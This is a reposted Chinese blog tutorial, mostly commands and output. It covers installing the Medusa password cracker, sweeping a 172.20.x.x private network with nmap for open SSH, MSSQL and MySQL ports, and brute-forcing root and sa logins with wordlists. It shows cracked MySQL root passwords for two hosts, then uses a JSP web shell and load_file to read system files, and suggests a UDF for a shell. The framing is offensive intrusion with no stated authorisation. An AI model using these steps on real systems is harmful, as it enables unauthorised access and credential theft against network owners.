[转载] ssh medusa 2.0

sudo ./configure --enable-module-ssh=yes

 

 

 

渗透linux环境的网络，口令破解是必不可少的。接下来介绍一款优秀的口令破解工具，首先先下载破解工具：

medusa 是一款不错的口令破解软件，速度也不错，使用的时候，需要提供破解的ip，medusa本身不提供扫描功能，读取ip也只能为

 

单个ip，所以需要和nmap之类软件配合使用获取开放端口的ip列表。再设置要破解的用户名字典和口令字典，即可破解。

./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.ttx

vnc 为要跑的开放了vnc的ip列表。

name.txt 用户名字典

pass.txt 口令字典

r.vnc.txt 保存结果的文件。 

 

 

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-

 

2.0.tar.gz

 

如果没有libssh2就装个http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

 

如果装错了就make uninstall再重装个，装完rm -rf libssh2-1.2.2，下面是安装方法：

 

tar zxvf medusa-2.0.tar.gz

 

cd medusa-2.0

 

./configure

 当前的版本是2.0，不过有个疑似bug的地方。在centos下，默认编译的时候没有ssh模块，但是看configure –help的时候，该模块

 

默认是yes的，也就是应该有的。需要手动编译时再指定一下这个模块：

./configure –prefix=/tools/medusa –enable-module-ssh=yes

看看ssh在里面没->enable_module_ssh，没有的话编译是没有ssh模块的

 

./make

 

./make install

 

要是ubuntu,就sudo apt-get install libssh2，要是linux就像上面这么麻烦了。

 

装好后用medusa -d查看各个模块是否正常，经常会现如下错误：

 

+ ssh.mod : Couldn’t load “/usr/local/lib/medusa/modules/ssh.mod” [libssh2.so.1: cannot open shared object file: 

 

No such file or directory

 

虽然已安装了libssh但是找不到ssh路径，这需要我们手工添加一个。etc 目录 下面有一个 叫 ld.so.conf 的文件，指明 so 文件

 

默认路径 ，一般的是 lib 和 usr lib ，编译出来的装在 usr local lib下了，所以要加一个，然后运行ldconfig，操作如下：

 

cat /etc/ls.do.conf

cat /etc/ld.so.conf

include ld.so.conf.d/*.conf

ls ld.so.conf.d/

 

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf

cat /etc/ld.so.conf.d/*

/usr/local/lib

/usr/lib/mysql

/usr/lib/qt-3.3/lib

ls -l /usr/local/lib/libssh*

-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a

-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.s

o.1.0.1

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2

.so.1.0.1

-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

 

ldconfig

 

最后再查询一下有没有ldd /usr/local/lib/medusa/modules/ssh.mod

 

配置好了路径后，再用-d看看ssh模块是否正常了。接下来就是medusa具体用法了：

 

# medusa

Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ALERT: Host information must be supplied.

 

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a

different parameter each time and they will all be sent to the module (i.e.

-m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process

the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module’s usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [NUM] : Resume scan from host #

 

我们再看看medusa有哪些模块支持什么功能的破解：

 

# medusa -d

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

Available modules in “.” :

 

Available modules in “/usr/local/lib/medusa/modules” :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0

+ http.mod : Brute force module for HTTP : version 2.0

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0

+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0

+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.0

+ web-form.mod : Brute force module for web forms : version 2.0

+ wrapper.mod : Generic Wrapper Module : version 2.0

 

支持的破解项目还是非常全面的，非常有利于渗透。首先我们确定目标，扫描开放ssh的机器，随便找个段扫描一下吧。扫描整个段

 

开了22端口的机器， 并且判断服务版本，保存到ssh文件中：

 

nmap -sV -p22 -oG ssh 172.20.3.0/24

 

Interesting ports on 172.20.3.132:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:16:B9:DB (Unknown)

 

Interesting ports on 172.20.3.133:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:09:E5 (Unknown)

 

Interesting ports on 172.20.3.134:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:72:49 (Unknown)

 

………………

 

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:77:7A (Unknown)

 

Interesting ports on 172.20.3.148:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:79:D0 (Unknown)

 

Interesting ports on 172.20.3.150:

PORT STATE SERVICE VERSION

22/tcp closed ssh

MAC Address: 00:1E:4F:16:B8:2F (Unknown)

 

Interesting ports on 172.20.3.151:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1E:4F:16:B9:EF (Unknown)

 

Interesting ports on 172.20.3.152:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

 

Interesting ports on 172.20.3.254:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

 

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds

cat ssh

# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 17

2.20.3.0/24

Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/

Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

 

# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds

 

类似这样的，这里我们要整理一下，把开了ssh的IP整理出来，现在明白oG保存的意义所在了

 

grep 22/open ssh | cut -d ” ” -f 2 >>ssh1.txt

 

cat ssh1.txt

 

172.20.3.28

172.20.3.61

172.20.3.62

172.20.3.63

172.20.3.64

 

加载ssh模块进行ssh破解

medusa -H ssh1.txt -u root -P p.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 

 

51 complete)

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 

 

51 complete)

………………

破解需要漫长的等待，ssh破解并不快，建议字典包含十几个到100个以内的常见密码就可以了，否则跑的时间比较长。或者配置-G 

 

、-T提高些一些破解速度。

 

推荐还是扫一扫sql…

 

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 //扫描172.20.0.1-172.20.5.254

 

grep 1433/open mssql | cut -d ” ” -f 2 >>mssql.txt

 

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

 

没有破出来，再试试破mysql：

 

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log //结果输出到pass.log

 

cat pass.log

# Medusa v.2.0 (2010-06-26 10:42:32)

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log

ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]

ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]

# Medusa has finished (2010-06-26 10:55:11).

 

运气还不错，接着利用jspshell连上172.20.1.115的mysql操作：

select load_file(‘c:/boot.ini’);

 

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)

 

rdisk(0)partition(2)\WINDOWS=”Windows Server 2003, Enterprise” /fastdetect /NoExecute=OptIn

 

原来是win2k3，可以继续写入个udf获得shell…

 

最后附上官方说明：http://www.foofus.net/~jmk/medusa/ChangeLog